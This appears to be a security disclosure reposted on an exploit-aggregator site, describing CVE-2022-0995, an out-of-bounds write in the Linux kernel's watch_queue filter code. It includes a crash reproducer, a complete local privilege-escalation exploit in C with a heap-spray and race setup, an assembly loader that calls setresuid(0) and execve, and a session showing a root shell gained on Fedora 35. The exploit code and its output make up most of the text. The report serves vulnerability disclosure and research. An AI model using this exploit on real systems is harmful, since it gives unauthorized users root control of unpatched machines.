Share
## https://sploitus.com/exploit?id=PACKETSTORM:189874
This bug report covers several issues in the watch_queue subsystem,
    which is only built when CONFIG_WATCH_QUEUE is enabled. That option seems
    to be disabled on e.g. Debian, but Ubuntu and Fedora enable it.
    
    The watch_queue subsystem has a bug that leads to an out-of-bounds
    write in watch_queue_set_filter():
    The first loop correctly checks for
    
    if (tf[i].type >= sizeof(wfilter->type_filter) * 8)
    
    but the second loop has the bound for .type wrong by a factor of 8
    (on 64-bit systems):
    
    if (tf[i].type >= sizeof(wfilter->type_filter) * BITS_PER_LONG)
    
    This leads to two out-of-bounds writes:
    
        out-of-bounds __set_bit() on wfilter->type_filter
        out-of-bounds write of array elements behind wfilter->filters
    
    The following reproducer triggers a KASAN splat:
    
    #define _GNU_SOURCE  
    #include <unistd.h>  
    #include <err.h>  
    #include <stdio.h>  
    #include <stdlib.h>  
    #include <sys/ioctl.h>  
    #include <sys/syscall.h>  
    #include <linux/watch_queue.h>  
      
    int main(void) {  
      int pipefds[2];  
      if (pipe2(pipefds, O_NOTIFICATION_PIPE))  
        err(1, "pipe2");  
      int pfd = pipefds[0];  
      
      struct watch_notification_filter \*filter =  
        malloc(sizeof(struct watch_notification_filter) +  
               sizeof(struct watch_notification_type_filter));  
      filter->nr_filters = 1;  
      filter->__reserved = 0;  
      filter->filters[0] = (struct watch_notification_type_filter){ .type = 1023 };  
      if (ioctl(pfd, IOC_WATCH_QUEUE_SET_FILTER, filter))  
        err(1, "SET_FILTER");  
    }  
    
    Here's the splat:
    
    [   83.180406][  T611] ==================================================================  
    [   83.181694][  T611] BUG: KASAN: slab-out-of-bounds in watch_queue_set_filter+0x659/0x740  
    [   83.182928][  T611] Write of size 4 at addr ffff88800d2c66bc by task watch_queue_oob/611  
    [...]  
    [   83.187234][  T611] Call Trace:  
    [   83.187712][  T611]  <TASK>  
    [   83.188133][  T611]  dump_stack_lvl+0x45/0x59  
    [   83.188796][  T611]  print_address_description.constprop.0+0x1f/0x150  
    [...]  
    [   83.190539][  T611]  kasan_report.cold+0x7f/0x11b  
    [...]  
    [   83.192236][  T611]  watch_queue_set_filter+0x659/0x740  
    [...]  
    [   83.194563][  T611]  __x64_sys_ioctl+0x127/0x190  
    [   83.195297][  T611]  do_syscall_64+0x43/0x90  
    [   83.195941][  T611]  entry_SYSCALL_64_after_hwframe+0x44/0xae  
    [...]  
    [   83.208194][  T611] Allocated by task 611:  
    [   83.208807][  T611]  kasan_save_stack+0x1e/0x40  
    [   83.209479][  T611]  __kasan_kmalloc+0x81/0xa0  
    [   83.210258][  T611]  watch_queue_set_filter+0x23a/0x740  
    [   83.211027][  T611]  __x64_sys_ioctl+0x127/0x190  
    [   83.211708][  T611]  do_syscall_64+0x43/0x90  
    [   83.212341][  T611]  entry_SYSCALL_64_after_hwframe+0x44/0xae  
    [   83.213177][  T611]   
    [   83.213510][  T611] The buggy address belongs to the object at ffff88800d2c66a0  
    [   83.213510][  T611]  which belongs to the cache kmalloc-32 of size 32  
    [   83.215452][  T611] The buggy address is located 28 bytes inside of  
    [   83.215452][  T611]  32-byte region [ffff88800d2c66a0, ffff88800d2c66c0)  
    
    In case you're wondering why syzkaller never managed to hit this:
    It actually has a definition file for watch queue stuff
    (https://github.com/google/syzkaller/blob/master/sys/linux/dev_watch_queue.txt),
    but that seems to be based on an older version of the series that introduced
    watch queues, so syzkaller doesn't know about O_NOTIFICATION_PIPE and instead
    tries to open /dev/watch_queue.
    
    Here's an extremely shoddy exploit that will sometimes give you a root shell
    on Fedora 35 and sometimes instead make the system hang/panic:
    
    [user@fedora watch_queue]$ cat watch_queue_oob_elf_phdr.c  
    #define _GNU_SOURCE  
    #include <unistd.h>  
    #include <err.h>  
    #include <stdio.h>  
    #include <stddef.h>  
    #include <sched.h>  
    //header conflict :/  
    //#include <fcntl.h>  
    int open(const char \*pathname, int flags, ...);  
    #include <stdlib.h>  
    #include <sys/ioctl.h>  
    #include <sys/inotify.h>  
    #include <sys/eventfd.h>  
    #include <sys/resource.h>  
    #include <sys/xattr.h>  
    #include <sys/wait.h>  
    #include <sys/mount.h>  
    #include <sys/syscall.h>  
    #include <linux/watch_queue.h>  
    #include <linux/elf.h>  
      
    #define SYSCHK(x) ({          \  
      typeof(x) __res = (x);      \  
      if (__res == (typeof(x))-1) \  
        err(1, "SYSCHK(" #x ")"); \  
      __res;                      \  
    })  
      
    int main(void) {  
      struct rlimit rlim_nofile;  
      SYSCHK(getrlimit(RLIMIT_NOFILE, &rlim_nofile));  
      rlim_nofile.rlim_cur = rlim_nofile.rlim_max;  
      SYSCHK(setrlimit(RLIMIT_NOFILE, &rlim_nofile));  
      
      // pin to one CPU core  
      cpu_set_t cpu_set;  
      CPU_ZERO(&cpu_set);  
      CPU_SET(0, &cpu_set);  
      SYSCHK(sched_setaffinity(0, sizeof(cpu_set_t), &cpu_set));  
      
      // create notification pipes, without filters yet  
      int pfds[128];  
      for (int i=0; i<128; i++) {  
        int pipefds[2];  
        SYSCHK(pipe2(pipefds, O_NOTIFICATION_PIPE));  
        pfds[i] = pipefds[0];  
        close(pipefds[1]);  
      }  
      
      // create a child with SCHED_IDLE policy that runs execve() when told to  
      int continue_eventfd = SYSCHK(eventfd(0, 0));  
      pid_t child = SYSCHK(fork());  
      if (child == 0) {  
        struct sched_param param = { .sched_priority = 0 };  
        SYSCHK(sched_setscheduler(0, SCHED_IDLE, &param));  
      
        eventfd_t evfd_value;  
        SYSCHK(eventfd_read(continue_eventfd, &evfd_value));  
      
        SYSCHK(execl("/usr/bin/newgrp", "newgrp", "--bogus", "/bin/bash", NULL));  
      }  
      
      // set up an inotify watch to notify us every time the ELF parser reads from  
      // the ELF binary (which involves preempting the ELF parser).  
      int infd = SYSCHK(inotify_init());  
      SYSCHK(inotify_add_watch(infd, "/usr/bin/newgrp", IN_ACCESS));  
      
      // spam kmalloc-32 a bit. note that this might not be enough spam, depending  
      // on how fragmented the slab is...  
      // after spamming the slab, free all our allocations again, so that hopefully  
      // we end up with a (more or less) empty CPU slab.  
    #define NUM_SPAM 10000 /\* 900 \*/  
      SYSCHK(unshare(CLONE_NEWUSER|CLONE_NEWNS));  
      SYSCHK(mount("none", "/dev/shm", "tmpfs", MS_NOSUID|MS_NODEV, ""));  
      int tmpfile = SYSCHK(open("/dev/shm/", O_TMPFILE|O_RDWR, 0666));  
      for (int i=0; i<NUM_SPAM; i++) {  
        char name[14] = "security.XXXX";  
        name[ 9] = 'A' + ((i >>  0) % 16);  
        name[10] = 'A' + ((i >>  4) % 16);  
        name[11] = 'A' + ((i >>  8) % 16);  
        name[12] = 'A' + ((i >> 12) % 16);  
        SYSCHK(fsetxattr(tmpfile, name, "", 0, XATTR_CREATE));  
      }  
      close(tmpfile);  
      
      // launch the ELF parser and preempt at every read.  
      // note that PREEMPT_VOLUNTARY means we actually don't get rescheduled  
      // directly at kernel_read(), instead it happens on the next kmalloc():  
      // __kmalloc() -> slab_alloc() -> slab_alloc_node() -> slab_pre_alloc_hook()  
      // -> might_alloc() -> might_sleep_if() -> might_sleep() -> might_resched()  
      // -> __cond_resched()  
      //  
      // First preemption is the allocation of memory for program headers,  
      // second preemption is the allocation of memory for the interpreter name.  
      // At the second preemption, the program headers have been loaded into  
      // memory but the interpreter name's offset hasn't been read yet.  
      // Third preemption is after the interpreter name has been stored in the  
      // allocation but before it is passed to the VFS for opening.  
      SYSCHK(eventfd_write(continue_eventfd, 1));  
      for (int i=0; i<3; i++) {  
        struct inotify_event inev;  
        if (SYSCHK(read(infd, &inev, sizeof(inev))) != sizeof(inev))  
          errx(1, "bad inotify_event size");  
      }  
      
      struct watch_notification_filter \*filter =  
        malloc(sizeof(struct watch_notification_filter) +  
               2 \* sizeof(struct watch_notification_type_filter));  
      filter->nr_filters = 1;  
      filter->__reserved = 0;  
      filter->filters[0] = (struct watch_notification_type_filter){  
        .type = 20 \* 8,  
        .info_mask = 0x80  
      };  
      for (int i=0; i<127; i++) {  
        SYSCHK(ioctl(pfds[i], IOC_WATCH_QUEUE_SET_FILTER, filter));  
      }  
      
      int status;  
      int wait_res = wait(&status);  
      printf("wait_res = %d\n", wait_res);  
      if (WIFEXITED(status)) {  
        printf("exited with status %d\n", WEXITSTATUS(status));  
      } else if (WIFSIGNALED(status)) {  
        printf("signaled with signal %d\n", WTERMSIG(status));  
      } else {  
        printf("other?\n");  
      }  
    }  
    [user@fedora watch_queue]$ gcc -o watch_queue_oob_elf_phdr watch_queue_oob_elf_phdr.c  
    [user@fedora watch_queue]$ cat bogus-loader.S  
    .global _start  
    _start:  
    /\* setresuid(0, 0, 0) \*/  
    mov $117, %eax  
    mov $0, %rdi  
    mov $0, %rsi  
    mov $0, %rdx  
    syscall  
      
    /\* execve(argv[2], argv+2, envv) \*/  
    mov $59, %eax  
    mov 24(%rsp), %rdi  
    lea 24(%rsp), %rsi  
    lea 40(%rsp), %rdx /\* assume argc==3 \*/  
    syscall  
    int $3  
    [user@fedora watch_queue]$ as -o bogus-loader.o bogus-loader.S  
    [user@fedora watch_queue]$ ld -shared -o $'\x80' bogus-loader.o  
    [user@fedora watch_queue]$ ./watch_queue_oob_elf_phdr   
    [root@fedora watch_queue]# id  
    uid=0(root) gid=1000(user) groups=1000(user),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023  
    
    There are also some other bugs in the subsystem, but those are less
    easy to exploit or not security bugs at all:
    
        free_pipe_info() first calls put_watch_queue(), which RCU-frees the
        struct watch_queue. Then afterwards it calls pipe_buf_release() on the
        pipe buffers, which calls watch_queue_pipe_buf_release(), which calls
        set_bit() on the already RCU-freed watch_queue. This is at least
        theoretically a UAF, in particular under CONFIG_PREEMPT.
    
        watch_queue_pipe_buf_ops has a .get handler that calls
        try_get_page() and a .release handler that doesn't touch the page count.
        This would be a bug, except that this is dead code because none of the
        splice stuff works on notification pipes.
    
        From what I can tell, watch_queue_set_size() permits setting a
        non-power-of-two number of buffers, which will break the code that
        assumes that you can use bitmasks instead of modulo for indexing into
        the pipe buffers array.
    
        watch_queue_set_size() sets wqueue->nr_notes to nr_notes rounded up
        to a multiple of WATCH_QUEUE_NOTES_PER_PAGE while allocating the
        ->notes_bitmap with size nr_notes bits rounded up to a multiple of
        BITS_PER_LONG. On architectures with big PAGE_SIZE, this could lead to
        wqueue->nr_notes being bigger than the bitmap.
    
        wqueue->notes_bitmap is never freed.
    
        There is no synchronization between post_one_notification() and
        pipe_read(), neither locking nor smp_store_release().
    
        watch_queue_clear() has a comment claiming that ->defunct prevents
        new additions and notifications, but actually it only prevents
        notifications, not additions.
    
    This bug is subject to a 90-day disclosure deadline. If a fix for this
    issue is made available to users before the end of the 90-day deadline,
    this bug report will become public 30 days after the fix was made
    available. Otherwise, this bug report will become public at the deadline.
    The scheduled deadline is 2022-06-08.
    
    
    Related CVE Number: CVE-2022-0995.
    
    Credit: Jann Horn